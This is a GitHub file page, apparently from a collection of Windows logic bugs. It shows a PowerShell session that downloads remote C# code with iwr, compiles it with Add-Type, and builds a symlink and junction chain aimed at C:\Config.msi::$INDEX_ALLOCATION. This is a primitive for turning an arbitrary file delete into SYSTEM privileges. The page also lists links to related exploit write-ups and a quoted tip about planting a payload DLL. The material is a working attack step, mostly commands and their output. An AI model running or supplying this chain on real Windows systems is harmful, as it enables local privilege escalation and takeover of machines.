-
Notifications
You must be signed in to change notification settings - Fork 75
/
Copy pathdir_delete2system.txt
44 lines (30 loc) · 1.69 KB
/
dir_delete2system.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
PS C:\Users\saila> $code = (iwr https://raw.githubusercontent.com/sailay1996/awesome_windows_logical_bugs/master/sharplinkmodified.txt).content
PS C:\Users\saila> Add-Type $code
PS C:\Users\saila> $s = New-Object de.usd.SharpLink.Symlink("C:\EOP\hello\abc.txt", "C:\Config.msi`:`:`$INDEX_ALLOCATION")
PS C:\Users\saila> $s.Status()
[+] Link type: File system symbolic link
[+] Link path: C:\EOP\hello\abc.txt
[+] Target path: C:\Config.msi::$INDEX_ALLOCATION
[+] Associated Junction: none
[+] Associated DosDevice: none
PS C:\Users\saila> $s.Open()
[+] Creating Junction: C:\EOP\hello -> \RPC CONTROL
[+] Creating DosDevice: Global\GLOBALROOT\RPC CONTROL\abc.txt -> \??\C:\Config.msi::$INDEX_ALLOCATION
[+] Symlink setup successfully.
PS C:\Users\saila> $s.Close()
[+] Removing Junction: C:\EOP\hello
[+] Deleting DosDevice: Global\GLOBALROOT\RPC CONTROL\abc.txt -> \??\C:\Config.msi::$INDEX_ALLOCATION
[+] Symlink deleted.
/~https://github.com/thezdi/PoC/tree/master/FilesystemEoPs
/~https://github.com/bugzzzhunter/Folder-Deletion-to-System-Shell
https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks
https://secret.club/2020/04/23/directory-deletion-shell.html
https://twitter.com/jonasLyk/status/1334751961846050816
"Use your arb del on C:\Windows\Temp\*-*-*-*-*-Sigs - recreate dir, now payload indir as edgegdi.dll"
/~https://github.com/thesecretclub/ArbitraryDirectoryDeletion/blob/master/wer.h
by @jonasLyk
@gweeperx's
/~https://github.com/DimopoulosElias/Primitives
/~https://github.com/sailay1996/delete2SYSTEM
/~https://github.com/klinix5/WinDefend_ZeroDay
https://0x00sec.org/t/windows-defender-av-zero-day-vulnerability/22258